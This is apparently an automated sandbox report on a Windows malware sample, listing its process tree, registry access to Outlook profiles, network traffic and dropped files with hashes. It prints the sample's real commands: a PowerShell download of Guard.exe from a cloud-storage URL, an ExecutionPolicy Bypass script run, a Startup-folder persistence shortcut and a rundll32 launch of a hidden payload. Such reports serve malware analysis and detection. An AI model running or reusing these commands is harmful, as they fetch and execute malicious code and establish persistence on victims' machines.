PID 2392 wrote to memory of 4128 N/A C:\Users\Public\Guard.exe C:\Users\Public\jsc.exe
PID 2392 wrote to memory of 4128 N/A C:\Users\Public\Guard.exe C:\Users\Public\jsc.exe
PID 2392 wrote to memory of 3232 N/A C:\Users\Public\Guard.exe C:\Users\Public\jsc.exe
PID 2392 wrote to memory of 3232 N/A C:\Users\Public\Guard.exe C:\Users\Public\jsc.exe
PID 2392 wrote to memory of 3232 N/A C:\Users\Public\Guard.exe C:\Users\Public\jsc.exe
PID 2392 wrote to memory of 3232 N/A C:\Users\Public\Guard.exe C:\Users\Public\jsc.exe
PID 2392 wrote to memory of 3232 N/A C:\Users\Public\Guard.exe C:\Users\Public\jsc.exe
PID 3232 wrote to memory of 4476 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 3232 wrote to memory of 4476 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 3232 wrote to memory of 4476 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 3232 wrote to memory of 4476 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 3232 wrote to memory of 4476 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 3232 wrote to memory of 4476 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 3232 wrote to memory of 4476 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 3232 wrote to memory of 4476 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 3232 wrote to memory of 4476 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 3232 wrote to memory of 4476 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 3232 wrote to memory of 4476 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 3232 wrote to memory of 4476 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 3232 wrote to memory of 4476 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 3232 wrote to memory of 4476 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 4476 wrote to memory of 872 N/A C:\Users\Public\jsc.exe C:\Windows\SysWOW64\cmd.exe
PID 4476 wrote to memory of 872 N/A C:\Users\Public\jsc.exe C:\Windows\SysWOW64\cmd.exe
PID 4476 wrote to memory of 872 N/A C:\Users\Public\jsc.exe C:\Windows\SysWOW64\cmd.exe
PID 872 wrote to memory of 4772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 872 wrote to memory of 4772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 872 wrote to memory of 4772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 4476 wrote to memory of 2928 N/A C:\Users\Public\jsc.exe C:\Windows\SysWOW64\rundll32.exe
PID 4476 wrote to memory of 2928 N/A C:\Users\Public\jsc.exe C:\Windows\SysWOW64\rundll32.exe
PID 4476 wrote to memory of 2928 N/A C:\Users\Public\jsc.exe C:\Windows\SysWOW64\rundll32.exe
PID 2928 wrote to memory of 4788 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 4788 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 4788 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 1432 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 1432 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 1432 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 4668 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 4668 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 4668 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 4248 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 4248 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 4248 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 4248 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 4248 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 4248 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 4248 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 4248 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 4248 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 4248 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 4248 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 540 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 540 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 540 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\rundll32.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe

"C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri "https://my.cloudme.com/v1/ws2/:slight-stood/:web_1/web" -OutFile "C:\Users\Public\Guard.exe""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"

C:\Users\Public\Guard.exe

"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3

C:\Windows\SysWOW64\cmd.exe

cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\Admin\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit

C:\Users\Public\jsc.exe

C:\Users\Public\jsc.exe

C:\Users\Public\jsc.exe

C:\Users\Public\jsc.exe

C:\Users\Public\jsc.exe

"C:\Users\Public\jsc.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\.ses",start

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4476 -ip 4476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4476 -s 412

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 my.cloudme.com udp
SE 83.140.241.4:443 my.cloudme.com tcp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 4.241.140.83.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
SE 83.140.241.4:443 my.cloudme.com tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 75.117.19.2.in-addr.arpa udp
FR 46.105.141.51:443 tcp
US 8.8.8.8:53 51.141.105.46.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
N/A 127.0.0.1:20196 tcp
N/A 127.0.0.1:20196 tcp
N/A 127.0.0.1:20196 tcp
N/A 127.0.0.1:20196 tcp
N/A 127.0.0.1:20210 tcp
N/A 127.0.0.1:20210 tcp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
N/A 127.0.0.1:20196 tcp
N/A 127.0.0.1:20196 tcp
N/A 127.0.0.1:20196 tcp
N/A 127.0.0.1:20196 tcp
N/A 127.0.0.1:20196 tcp
N/A 127.0.0.1:20196 tcp
FR 46.105.141.51:443 tcp
N/A 127.0.0.1:20196 tcp
N/A 127.0.0.1:20196 tcp
N/A 127.0.0.1:20196 tcp

Files

memory/1632-0-0x00007FFBFAB63000-0x00007FFBFAB65000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dyzhh5qo.0zf.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1632-10-0x000001BCDF980000-0x000001BCDF9A2000-memory.dmp

memory/1632-11-0x00007FFBFAB60000-0x00007FFBFB621000-memory.dmp

memory/1632-12-0x00007FFBFAB60000-0x00007FFBFB621000-memory.dmp

memory/1632-16-0x00007FFBFAB60000-0x00007FFBFB621000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

memory/3668-19-0x00007FFBFAA10000-0x00007FFBFB4D1000-memory.dmp

memory/3668-25-0x00007FFBFAA10000-0x00007FFBFB4D1000-memory.dmp

memory/3668-30-0x00007FFBFAA10000-0x00007FFBFB4D1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c20ac38ae3022e305b8752804aadf486
SHA1 4c144d6cfafb5c37ab4810ff3c1744df81493cdb
SHA256 03cba7e903a418a3966af1dc0debfb5fcfb2ac6d372ec48cb1b93c23e0fd1caf
SHA512 c9def9e5cd09d19b8b47a3f4c61893da715a6ba4b9933c885386d0425ee4ccc30d75eac1097511619d4e6259a46581f803fb38f78a15339391e4e78b0b6153e0

C:\Users\Public\PublicProfile.ps1

MD5 315eab1b113060397deb5d4013e64eae
SHA1 d1578170885d0375b2aa22954badaeb36a539026
SHA256 dae667196e8dc197c7e0a5ecb4718d26f8a8276c72cc190e14cdf8ed67b3b8c5
SHA512 f74b12217c36bac596bda9ac1d86d256a13591916774b795dbd1cf1525c90f93d0b9fe26b68f19a4dacb751d0b4f3649e9cf42a2fa0a1e916b9326fbe3c09ced

memory/3668-33-0x00007FFBFAA10000-0x00007FFBFB4D1000-memory.dmp

memory/3668-34-0x00007FFBFAA10000-0x00007FFBFB4D1000-memory.dmp

memory/3668-35-0x00007FFBFAA10000-0x00007FFBFB4D1000-memory.dmp

C:\Users\Public\Guard.exe

MD5 18ce19b57f43ce0a5af149c96aecc685
SHA1 1bd5ca29fc35fc8ac346f23b155337c5b28bbc36
SHA256 d8b7c7178fbadbf169294e4f29dce582f89a5cf372e9da9215aa082330dc12fd
SHA512 a0c58f04dfb49272a2b6f1e8ce3f541a030a6c7a09bb040e660fc4cd9892ca3ac39cf3d6754c125f7cd1987d1fca01640a153519b4e2eb3e3b4b8c9dc1480558

memory/3668-40-0x00007FFBFAA10000-0x00007FFBFB4D1000-memory.dmp

C:\Users\Public\Secure.au3

MD5 4bdd41d598fd897ce21bd86264030448
SHA1 2907df32a0b8fb017a0f5ba53605245cc0119c44
SHA256 daf4100279eaabf2c17b8e08026f4da4ebd817dc16d381b3daebe7adb9384c7c
SHA512 7d3895d6640566bac911c3638328fd794ffcc6fcf4ce365848f0e498df16b4a5c5659efd4fb4eacb51d3d9a394457f55b9f3ae1c530de99554728b94d57d531f

C:\Users\Public\jsc.exe

MD5 94c8e57a80dfca2482dedb87b93d4fd9
SHA1 5729e6c7d2f5ab760f0093b9d44f8ac0f876a803
SHA256 39e87f0edcdd15582cfefdfab1975aadd2c7ca1e3a5f07b1146ce3206f401bb5
SHA512 1798a3607b2b94732b52de51d2748c86f9453343b6d8a417e98e65ddb38e9198cdcb2f45bf60823cb429b312466b28c5103c7588f2c4ef69fa27bfdb4f4c67dc

memory/3232-51-0x0000000000930000-0x0000000000DF2000-memory.dmp

memory/3232-54-0x00000000066A0000-0x0000000006B2E000-memory.dmp

memory/3232-55-0x0000000007D80000-0x0000000008210000-memory.dmp

memory/3232-56-0x00000000087C0000-0x0000000008D64000-memory.dmp

memory/3232-57-0x00000000082D0000-0x0000000008362000-memory.dmp

memory/3232-79-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-81-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-105-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-119-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-117-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-115-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-113-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-111-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-109-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-107-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-103-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-101-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-99-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-97-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-95-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-93-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-91-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-89-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-85-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-83-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-77-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-75-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-71-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-67-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-65-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-63-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-59-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-87-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-73-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-69-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-61-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-58-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-1132-0x0000000005A00000-0x0000000005E02000-memory.dmp

memory/3232-1133-0x00000000056B0000-0x00000000056FC000-memory.dmp

memory/3232-1137-0x0000000005710000-0x0000000005764000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\.ses

MD5 7d96e2ae9f73e6b73fadaac62119c2a0
SHA1 f0e8de3ec0d6eb9cb90ac952288b6a9b423fbb76
SHA256 4ce7ab94060f74f36288dcce8ec72b65778183d99064660644834010f42b736b
SHA512 01b5a3d8ced0baa1bc3d4337831bfdebbdd98e6400061d828a29ea31c04c56d15ac1aa66a0e81c787491f0a8a542430fd2a39173a9a6ef446f04149da1df7666

C:\Users\Admin\AppData\Local\Temp\Hstystr

MD5 2d20777d77d0faaca86d065cf2e94334
SHA1 1fb40a1251638132a9a839ba1dc3c97176f770c6
SHA256 d6697a56c0675418791a7cf1cb7ed8dcd6dd25aa0f23756c966b4f1d044ae994
SHA512 6745880a1994c9ab4d72acfd4814ca497db061e682a450983828b7a155c2f9d3e919859cbc563f5aa173fddcb083e50bfab5155eb1a6af15bf5e7cba9af86ddb

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\Riqafttyqfs

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574